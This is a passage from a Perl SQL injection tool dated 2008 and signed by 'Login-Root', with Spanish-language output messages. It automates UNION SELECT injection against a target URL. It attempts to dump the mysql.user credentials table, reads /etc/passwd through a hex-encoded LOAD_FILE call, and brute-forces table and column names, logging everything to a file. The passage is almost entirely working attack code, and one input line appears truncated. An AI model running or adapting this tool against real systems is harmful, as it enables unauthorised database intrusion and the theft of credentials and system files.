         		$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;

            	print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";

         	}

         else

         	{

            	print "\n[-] MySQL.User no disponible";

         	}

	while ($loadcont < $column-1)

	   {

		$loadfile.=','.'load_file(0x2f6574632f706173737764)';

		$loadcont++;

	   }

	print "\n[!] Chequeando si es posible inyectar LOAD_FILE...";

        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;

	$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");

         if($response =~ /root:x:0:0/)

         	{

         		print "\n[+] LOAD_FILE disponible...guardando en $ARGV[2]";

         		print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";

          }

         else

         	{

            	print "\n[-] LOAD_FILE no disponible";

         	}

	if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T")

         	{

              print "\n\n[!] Bruteando tablas...";

              print WEB "\n\n[TABLAS]:\n\n";

              foreach $tabla(@nombretabla)

                {

                  chomp($tabla);

                  $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;

                  $response=get($sql)or die("[-] Imposible obtener tablas\n");

                  if($response =~ /loginpwnz/)

                    {

                        print "\n[+] La tabla $tabla esta disponible...guardando en $ARGV[2]";

                        $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;

                        print WEB "$sql\n";

                    }

                }

           	}

        if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C")

          {

          	print "\n\n[!] Tabla a la cual brutear columnas: ";

            $tabla.=;

            chomp($tabla);

            print WEB "\n\n[COLUMNAS EN TABLA]: $tabla\n\n";

            foreach $columna(@nombrecolumna)

            {

             chomp($columna);

             $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;

             $response=get($sql)or die("[-] Imposible obtener columnas\n");

             if ($response =~ /loginpwnz/)

                  {

                      print "\n[+] La columna $columna esta disponible...guardando en $ARGV[2]";

                      print WEB "$columna\n";

                  }

            }

        }

        print WEB "\n\n\n[*EOF*]";

        print "\n\n[+] Todo salvado correctamente en $ARGV[2]\n\n";

        print "## c0ded by Login-Root | 2008 ##\n\n";

        exit (0);

      }

}

print "[-] Imposible encontrar numero de columnas, intentar con mas columnas\n\n";

print "## c0ded by Login-Root | 2008 ##\n\n";

exit (0);

By Login-Root